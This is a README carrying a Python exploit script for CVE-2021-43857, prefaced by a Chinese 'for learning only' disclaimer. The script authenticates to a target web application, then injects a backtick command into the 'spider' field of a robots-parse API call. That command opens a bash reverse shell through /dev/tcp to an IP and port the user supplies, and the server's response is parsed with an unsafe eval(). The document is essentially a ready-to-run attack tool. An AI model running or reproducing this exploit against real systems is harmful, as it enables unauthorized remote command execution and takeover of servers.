README.md
Rendering markdown...
#!/bin/python3
# coding:utf-8
# Author:lowkey0808
import sys
import requests
import argparse
import pyfiglet
print(pyfiglet.figlet_format('cve-2021-43857'))
print('''
免责声明:
脚本仅供学习参考,请勿恶意攻击他人网站,
如违法乱纪,造成一切后果由使用者自行承担
技术无罪,与作者无关
使用脚本默认同意以上说明!
--Author:lowkey0808
''')
def main():
try:
parser = argparse.ArgumentParser(description='cve-2021-43857', argument_default='', usage='')
parser.add_argument('-u', help='url', metavar='')
parser.add_argument('-U', help='登录用户', metavar='')
parser.add_argument('-P', help='登录密码', metavar='')
parser.add_argument('-r', help='反弹shellIP', metavar='')
parser.add_argument('-p', help='反弹端口', metavar='')
argv = parser.parse_args()
url = argv.u
username = argv.U
password = argv.P
ip = argv.r
port = argv.p
# 获得token
u1 = url + "/api/user/auth"
burp0_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0",
"Accept": "application/json, text/plain, */*",
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate", "Content-Type": "application/json;charset=utf-8",
"Origin": "%s" % url, "Connection": "close", "Referer": "%s" % url}
burp0_json = {"password": "%s" % password, "username": "%s" % username}
token = eval(requests.post(u1, headers=burp0_headers, json=burp0_json).text)
token = 'Token ' + token["token"]
print(token)
# getshell
u2 = url + '/api/project/robots/parse'
burp1_headers = {"User-Agent": "python-requests/2.20.1", "Accept-Encoding": "gzip, deflate", "Accept": "*/*",
"Connection": "keep-alive", "Authorization": "%s" % token}
burp1_json = {"spider": "`/bin/bash -c 'bash -i >& /dev/tcp/%s/%s 0>&1'`" % (ip, port)}
print(burp1_json)
requests.post(u2, headers=burp1_headers, json=burp1_json, timeout=2)
except Exception as e:
sys.exit()
if __name__ == "__main__":
main()